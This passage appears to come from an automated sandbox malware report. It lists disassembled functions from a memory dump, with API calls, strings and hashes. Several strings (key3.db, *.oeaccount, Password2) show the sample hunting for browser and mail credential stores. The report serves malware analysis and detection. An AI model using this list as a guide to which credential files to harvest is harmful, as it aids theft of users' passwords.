                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2775283111-0
                                                                                                                                                                                                                          • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                                          • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                                                                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                          • String ID: C@$key3.db
                                                                                                                                                                                                                          • API String ID: 1968906679-1993167907
                                                                                                                                                                                                                          • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                                          • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                                                          • API String ID: 3492281209-168460110
                                                                                                                                                                                                                          • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                                          • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen$_mbscat
                                                                                                                                                                                                                          • String ID: 8D
                                                                                                                                                                                                                          • API String ID: 3951308622-2703402624
                                                                                                                                                                                                                          • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                                                          • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                          • String ID: Password2
                                                                                                                                                                                                                          • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                          • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                                                          • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                                          • API String ID: 2574300362-543337301
                                                                                                                                                                                                                          • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                                          • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: rows deleted
                                                                                                                                                                                                                          • API String ID: 2221118986-571615504
                                                                                                                                                                                                                          • Opcode ID: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                                          • Instruction ID: 2c87624536f7d1d2c67b3f30ed48d8bcf82a012ac595ca9270874480dc5e5985
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47028F71E00218AFDF14DF99DD81AAEBBB5EF08314F14005AFA04A7352E775AD41CB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                                          • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                                          • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                          • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                                          • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                                          • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                                          • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: +MA$psow$winOpen
                                                                                                                                                                                                                          • API String ID: 2221118986-3077801942
                                                                                                                                                                                                                          • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                                          • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                                                                                          • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                          • API String ID: 2221118986-515162456
                                                                                                                                                                                                                          • Opcode ID: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                                          • Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                          • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                          • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                                          • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040269F
                                                                                                                                                                                                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                            • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1593657333-0
                                                                                                                                                                                                                          • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                                          • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C642
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                                                                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                                                                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3798638045-0
                                                                                                                                                                                                                          • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                                          • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                                                                                            • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B366
                                                                                                                                                                                                                          • atoi.MSVCRT ref: 0040B374
                                                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4107816708-0
                                                                                                                                                                                                                          • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                                          • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen
                                                                                                                                                                                                                          • String ID: >$>$>
                                                                                                                                                                                                                          • API String ID: 39653677-3911187716
                                                                                                                                                                                                                          • Opcode ID: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                                          • Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407709
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                                                                                                                                                                                                            • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                                                                                                                                                                                                            • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                                                                                                                                                                                                            • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040776C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1171893557-0
                                                                                                                                                                                                                          • Opcode ID: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                                                          • Instruction ID: 5e9a081d75c64704428ce8041afbbeb9d52fcced2ab343c8e96fa08cc39daf7c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E411DF71200600DFD730EF18D981D9AB7F5EF443247108A2EF552A7692C736B919CB54
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                                          • Opcode ID: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                                                          • Instruction ID: e24a5276dafad98c161ef6ad34afde8f808320b1c4234a0015a7989cc473ef50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12118C71608601AFD328CF2DC881A27F7E9FFD8300B20892EE59A87395DA35E801CB15
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00410890
                                                                                                                                                                                                                          • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                                                                                                                                                                                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004108E9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1479990042-0
                                                                                                                                                                                                                          • Opcode ID: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                                                          • Instruction ID: 22dc721301a1029169844026e50c0f3522bcecfb2be71eae7d1720ca74c813ee
